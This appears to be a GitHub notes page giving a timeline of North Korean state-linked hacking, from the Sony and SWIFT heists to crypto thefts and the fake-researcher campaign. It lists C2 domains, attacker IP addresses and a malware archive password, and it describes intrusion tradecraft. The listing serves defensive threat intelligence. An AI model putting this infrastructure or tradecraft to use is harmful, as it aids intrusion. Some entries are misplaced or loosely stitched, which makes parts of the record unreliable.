You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
INTERPOL’s Supernote Summit wherein they decide to change the bill.
Date:: 2006-07-26
Reported to be manufactured in the North Korea, the Supernote is a high-quality counterfeit of the 50-dollar and 100-dollar note, also known as a Superdollar. The notes are produced using similar processes and materials as genuine US currency.
First detected back in 1989, over $50M have been found as of 2006.
A large scale DDoS attack on US and South Korean websites uses the MYDOOM and Dozer malware, which is suspected to have arrived in email messages. The malware places the text “Memory of Independence Day” in the Master Boot Record (MBR).
Operation Troy DDoS Attacks
Date:: 2009-2012:
Cyber-espionage campaign that utilized unsophisticated DDoS to target the South Korean govt
“Ten Days of Rain” attack targets South Korean media, financial, and critical infrastructure targets. Compromised computers within South Korea are used to launch DDoS attacks.
On March 4th of this year, exactly 20 months to the day of a similar incident on US Independence Day in 2009, a botnet based out of South Korea launched Distributed Denial of Service (DDoS) attacks against 40 sites affiliated with South Korean government, military and civilian critical infrastructure as well as U.S. Forces Korea and the U.S. Air Force Base in Kunsan, South Korea.
Prosecutors said that a laptop used by a subcontractor "became in September 2010 a zombie PC operated by the North, which... later remotely staged the attack through the laptop".
One of the Internet Protocol (IP) addresses used to break into Nonghyup's system was the same as one used in March for a distributed denial-of-service (DDoS) attack that originated in North Korea, they added.
The software used in the incident was also similar to that employed in July 2009, when a number of South Korean government websites were attacked, the prosecutors said.
The hackers made the laptop a zombie computer on Sept. 4 in 2010 and managed it for seven months, obtaining inside information and operating the file deletion command remotely, according to the prosecution.
DarkSeoul Wiper Attacks
Date:: 2013-03-20
DarkSeoul: a wiper attack that targeted three South Korean broadcast companies, financial institutes, and an ISP
At the time, two other groups going by the personas ″NewRomanic Cyber Army Team and WhoIs Team″, took credit for that attack
2014
Sony Pictures Hack Wiper Attack Occurs
Date:: 2014-11-24
Sony Pictures Entertainment (“SPE”) and its comedic film “The Interview,” which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the “supreme leader” of North Korea
Lazarus targeted individuals and entities associated with the production of “The Interview” and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
The same group of subjects also targeted individuals associated with the release of “The Interview,” among other victims.
Perpetrators identified themselves as the Guardians of Peace.
Large amounts of data were stolen and slowly leaked in the days following the attack.
U.S. investigators say the culprits spent at least two months copying critical files
The attack was conducted using malware. Server Message Block Worm Tool to conduct attacks
Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
November 24, 2014 - malware previously installed rendered many Sony employees' computers inoperable by the software, with the warning by a group calling themselves the Guardians of Peace, along with a portion of the confidential data taken during the hack.
Several Sony-related Twitter accounts were also taken over
Operation Red Dot against South Korean Govt/Defence Co's
Date:: 2014-2015:
Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them.
By March the hackers had a backdoor to teh bank's electronic communication system allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols, and did not alert security to their presence.
SWIFT Heists
2015-2019
Attempts from 2015 through 2019 to steal more than $1.2 billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks’ computer networks and sending fraudulent SWIFT messages.
Sony Pictures Hack - Intrusion into Mammoth Screen, producer of a fictional series involving a British nuclear scientist taken prisoner in DPRK
The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database.
Engaged in computer intrusions and cyber-heists at many financial services victims in the United States, and in other countries in Europe, Asia, Africa, North America, and South America in 2015, 2016, 2017, and 2018, with attempted losses well over $1 billion.
Date:: 2015-2018
BAE Systems Threat Research Blog: Cyber Heist Attribution
FASTCash - $16M dollars was withdrawn from roughly 1700 7-Eleven A.T.M.s across Japan using data stolen from South Africa’s Standard Bank
Date:: 2016-05-14
Tien Phong Bank in Vietnam SWIFT Heist - $1M
Date:: 2016-05-15
Vietnam’s Tien Phong Bank said that it interrupted an attempted cyber heist that involved the use of fraudulent SWIFT messages, just like the Bangladesh Bank Heist
SWIFT Heists Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank
Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.
Malware used by the group was also deployed in targeted attacks against a bank in the Philippines. In addition to this, some of the tools used share code similarities with malware used in historic attacks linked to a threat group known as Lazarus. The attacks can be traced back as far as October 2015, two months prior to the discovery of the failed attack in Vietnam, which was hitherto the earliest known incident.
The attack against the Bangladesh central bank triggered an alert by payments network SWIFT, after it was found the attackers had used malware to cover up evidence of fraudulent transfers. SWIFT issued a further warning, saying that it had found evidence of malware being used against another bank in a similar fashion. Vietnam’s Tien Phong Bank subsequently stated that it intercepted a fraudulent transfer of over $1 million in the fourth quarter of last year. SWIFT concluded that the second attack indicates that a “wider and highly adaptive campaign” is underway targeting banks.
A third bank, Banco del Austro in Ecuador, was also reported to have lost $12 million to attackers using fraudulent SWIFT transactions. However, no details are currently known about the tools used in this incident or if there are any links to the attacks in Asia.
Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee. At first, it was unclear what the motivation behind these attacks were, however code sharing between Trojan.Banswift (used in the Bangladesh attack used to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.
SWIFT Heists Evidence of Stronger Ties Between North Korea and SWIFT Banking Attacks
Multiple spear-phishing campaigns targetting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S.Department of State, and the U.S. Department of Defense
which included documents known as Operational Plan 5015—a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to “decapitate” North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, “Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.”
2017
Lazarus Under The Hood
Date:: 2017-04-03
Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto.
Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.
This DHS-FBI Joint Technical Alert provides information, including IOCs on the ransomware variant known as WannaCry. The U.S. Government publicly attributed this WannaCry ransomware variant to the North Korean government.
Creation of the destructive WannaCry 2.0 ransomware in May 2017
The extortion and attempted extortion of victim companies from 2017 through 2020 involving the theft of sensitive data and deployment of other ransomware.
210.52.109.22 - China Netcom, 210.52.109.0/24 is assigned to North Korea
175.45.178.222 - Natinal Defence Commission
175.45.178.19 - Ghost RAT
175.45.178.97 - Ghost RAT
Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures were reportedly employed during this compromise were different than those we have observed in following intrusion attempts and as of yet there are no clear indications of North Korean involvement).
Date:: 2017-04-22
The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
Date:: 2017-04-26
Spearphishing against South Korean Exchange #1 begins.
Date:: 2017-05-01
South Korean Exchange #2 compromised via spearphish.
Date:: 2017-05-30
More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
Date:: 2017-06-01
CISA: Report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
Date:: 2017-06-13
This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure.
STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
The World Once Laughed at North Korean Cyberpower. No More.
CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
North Korea suspected in latest bitcoin heist, bankrupting Youbit exchange
DHS and FBI identified a Trojan malware variant—referred to as BANKSHOT—used by the North Korean government. This MAR analyzes three malicious executable files.
Two files are 32-bit Windows executables that function as Proxy servers and implement a Fake TLS method.
The third file is an Executable Linkable Format file designed to run on Android platforms as a fully functioning Remote Access Trojan.
2018
TrendMicro's KillDisk Variant Hits Latin American Financial Groups
DHS and FBI identified a Trojan malware variant—referred to as SHARPKNOT—used by the North Korean government. SHARPKNOT is a 32-bit Windows executable file. When executed from the command line, the malware overwrites the Master Boot Record and deletes files on the local system, any mapped network shares, and physically connected storage devices.
Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers.
SWIFT is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on SWIFT’s network or core messaging services.
CISA's analysis of HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
Date:: 2018-05-29
CISA Alert TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
MAR 10135536-3: HIDDEN COBRA RAT/Worm
This Joint Technical Alert and MAR authored by DHS and FBI provides information, including IOCs associated with two families of malware used by the North Korean government: A remote access tool, commonly known as Joanap; and Server Message Block worm, commonly known as Brambul.
NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea
Banco de Chile Wiper Attack Just a Cover for $10M SWIFT Heist
Date:: 2018-06-13
analysts discovered that the code is actually a modified version of the Buhtrap malware component known as kill_os. The module renders the local operating system and the Master Boot Record (MBR) unreadable by erasing them.
DHS and FBI identified a Trojan malware variant—referred to as TYPEFRAME—used by the North Korean government. DHS and FBI distributed this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity. This malware report contains an analysis of multiple malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications macros.
Andariel has been quite active these past few months. According to South Korean security researchers IssueMakersLab, the group used an ActiveX zero-day exploit for watering hole attacks on South Korean websites last May—they called this “Operation GoldenAxe”. But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes.
CISA's analysis of North Korean Trojan: KEYMARBLE
Date:: 2018-08-09
AR 10135536-17
DHS and FBI identified a Trojan malware variant—referred to as KEYMARBLE—used by the North Korean government. KEYMARBLE is a RAT capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screen shots, and exfiltrating data.
DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer Jin Hyok Park
Date:: 2018-09-06
Nathan P. Shields, FBI, Los Angeles Field Office
Park worked for front company Chosun Expo Joint Venture aka Korea Expo Joint Venture” aka “Chosun Expo
Cryptocurrency businesses targeted by Lazarus via custom PowerShell Scripts
Date:: 2018-11-01
Developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects.
Operation AppleJeus research highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses
Date:: 2018
New ability to target macOS.
Infected with malware after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited showed no signs of malicious behaviour and looked genuine. Malware delivered via update files in app. User installed this program via a download link delivered over email.
For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot.
The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
CryptoCore
C2:: service.amzonnews[.]club
C2:: 75.133.9[.]84
C2:: update.gdrives[.]top
C2:: googledrive[.]network
C2:: drverify.dns-cloud[.]net
C2:: docs.googlefiledrive[.]com
C2:: europasec.dnsabr[.]com
C2:: eu.euprotect[.]net
C2:: 092jb_378v3_1.googldocs[.]org
C2:: gbackup.gogleshare[.]xyz
C2:: drive.gogleshare[.]xyz
C2:: down.financialmarketing[.]live
C2:: drivegoogle.publicvm[.]com
C2:: googledrive.publicvm[.]com
C2:: mskpupdate.publicvm[.]com
C2:: googledrive[.]email
C2:: iellsfileshare.sharedrivegght[.]xyz
C2:: download.showprice[.]xyz
C2:: downs.showprice[.]xyz
C2:: mdown.showprice[.]xyz
C2:: start.showprice[.]xyz
C2:: u13580130.ct.sendgrid[.]net
CISA's analysis of North Korean Malware ELECTRICFISH and BADCALL
Date:: 2019-09-09
MAR 10135536-21: North Korean Proxy Malware: ELECTRICFISH Note: this version of the ELECTRICFISH MAR updates the May 9, 2019 version.
MAR 10135536-10: North Korean Trojan: BADCALL Note: this version of the BADCALL MAR updates the February 6, 2018 version: and STIX file.
CISA, FBI, and DoD identified multiple malware variants used by the North Korean government.
ELECTRICFISH implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address.
BADCALL malware is an executable that functions as a proxy server and implements a Fake TLS method.
Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups
Kaspersky Global Research and Analysis Team have discovered a previously unknown spy tool, which had been spotted in Indian financial institutions and research centers. Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
In 2018, Kaspersky researchers discovered ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with the ATMDtrack, but at the same time were not aimed at ATMs. Instead, its list of functions defined it as spy tools, now known as Dtrack.
Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistence threat actor responsible for multiple cyberespionage and cyber sabotage operations.
Indian Nuclear Power Plant Attack We have long known and continuously monitored North Korea is attacking India
This is an image of the history of malware used by the North Korean hacker group B that hacked the Kudankulam Nuclear Power Plant(KKNPP) in India. A 16-digit string dkwero38oerA^t@# is the password that malware uses to compress a list of files on an infected PC.
CISA's analysis of North Korean Trojans BISTROMATH, SLICKSHOES, CROWDEDFLOUNDER, HOTCROISSANT, ARTFULPIE, BUFFETLINE, HOPLIGHT
Date:: 2020-02-14
Note: this version of HOPLIGHT MAR updates the October 31, 2019 version, which updated April 10, 2019 version.
BISTROMATH looks at multiple versions of a full-featured Remote Access Trojan implant executable and multiple versions of the CAgent11 GUI implant controller/builder.
SLICKSHOES is a Themida-packed dropper that decodes and drops a Themida-packed beaconing implant.
CROWDEDFLOUNDER looks at Themida packed Windows executable.
HOTCROSSIANT is a full-featured beaconing implant.
ARTFULPIE is an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL.
BUFFETLINE is a full-featured beaconing implant.
HOPLIGHT looks at multiple malicious executable files. Some of which are proxy applications that mask traffic between the malware and the remote operators.
Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group
How an elaborate North Korean crypto hacking heist fell apart
Date:: 2020-03-05
Two of the usernames adopted were “snowsjohn” and “khaleesi”. Between July 2018 and April 2019, they handled $100,812,842.54 in cryptocurrency transactions which were linked back to the $250m heist on the crypto exchange.
UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, we have named this CAKETAP.
Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.
U.S. Government Advisory: Guidance on the North Korean Cyber Threat
Date:: 2020-04-15
The U.S. Departments of State, Treasury, and Homeland Security and FBI issued this Advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The Advisory highlights the cyber threat posed by North Korea and provides recommended steps to mitigate the threat.
CISA's analysis of North Korean Trojans: COPPERHEDGE, TAINTEDSCRIBE, PEBBLEDASH
Date:: 2020-05-12
MAR 1028834-1.v1: North Korean Remote Access Tool: COPPERHEDGE
MAR 1028834-2.v1: North Korean Trojan: TAINTEDSCRIBE
MAR 1028834-3.v1: North Korean Trojan: PEBBLEDASH
CISA, FBI, and DoD identified three malware variants used by the North Korean government.
COPPERHEDGE is Manuscrypt family of malware is used by APT cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a
TAINTEDSCRIBE and PEBBLEDASH are full-featured beaconing implants.
U.S. Government Advisory: Top 10 Routinely Exploited Vulnerabilities
Date:: 2020-05-12
CISA, FBI, and the broader U.S. Government authored a Joint Alert with details on vulnerabilities routinely exploited by foreign cyber actors, including North Korean cyber actors.
USA Chargees 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons
Date:: 2020-05-28
Bringing criminal charges against 28 North Korean and 5 Chinese nationals for conspiring to violate DPRK and proliferation sanctions.
The group often uses Google Drive as the storage for its files, specifically the bait
Relatively heavy use of VBS files both as downloaders and as backdoors. What appears to be the main backdoor of the group is also a VBS file (tracked by Proofpoint Emerging Threats as CageyChameleon), rather than an executable or an in-memory payload.
LNK shortcuts as downloaders – we have seen the attackers hide LNK shortcuts behind icons and titles of other file types, mostly text files. Sometimes it could be a password file needed to open the main document, sometimes it could be the main document that is actually a shortcut, but LNK files are a staple for this group. These files are used to connect to the command and control (C2) server and download next-stage files.
.xyz TLD via NameCheap
The VBS created in %TEMP% acts as a downloader for another VBS. That VBS collects: Username, Host name, OS version, install date and run time, Time zone, CPU name, Execution path of the VBS in %TEMP%, Network adapter information, List of running processes. The information is sent to the C2 server every minute, and it expects additional VBS as a response.
VHD ransomware, Hakuna MATA
Date:: 2020-07-01
initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server.
U.S. seeks forfeiture of $2,372,793 for violations of sanctions against the DPRK
Date:: 2020-07-23
According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
The complaint lists one source of the laundered funds as a DPRK entitity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian pretroleum products and nuclear and missile components for the DPRK and to aid multiple cover branches of the DPRK’s Foreign Trade bank, which the U.S. Treasury Department had sanctioned for “facilitating transactions on behalf of actors linked to the DPRK’s proliferation network”.
Yang Ban Corporation Pleads Guilty to Money Laundering
Date:: 2020-08-31
From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent “banks’ sanction and anti-money laundering filters” thus “duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.”
Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, “to conceal the North Korean nexus” by falsifying shipping records and by other means.
The company will pay a financial penalty totaling $673,714 (USD) and has “agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee”.
It succeeded in infecting several dozens of companies and organizations in Israel and globally
Main targets: defense, governmental companies, and specific employees of those companies
We assess this to be this year’s main offensive campaign by the Lazarus group
The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country.
CISA's analysis of North Korean Remote Access Trojan: BLINDINGCAN
Date:: 2020-08-19
CISA and FBI have identified a malware variant—referred to as BLINDINGCAN—used by North Korean actors. FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies.
DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign
CISA: Report FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks
Date:: 2020-08-26
MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.”
US DOJ: Forfeiture Complaint for 280 Crypto addresses tied to North Korea
Date:: 2020-08-28
These actors stole millions of dollars’ worth of cryptocurrency and ultimately laundered the funds through Chinese over-the-counter (OTC) cryptocurrency traders.
US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020. Such apps include Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale.
Date:: 2020-09-20
Secret documents show how North Korea launders money through U.S. banks
An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email.
CISA: Report on North Korean Advanced Persistent Threat Focus: Kimsuky
Date:: 2020-10-27
CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky.
North Korean hackers targeted COVID vaccine maker AstraZeneca
By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research.
North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses.
Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as “Lazarus Group,” which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old.
Google TAG report on a new campaign targeting security researchers
Date:: 2021-01-25
government-backed entity based in North Korea. Social media targetting.
the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email
A pre-build event with a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event is an innovative technique to gain execution.
Klackring malware
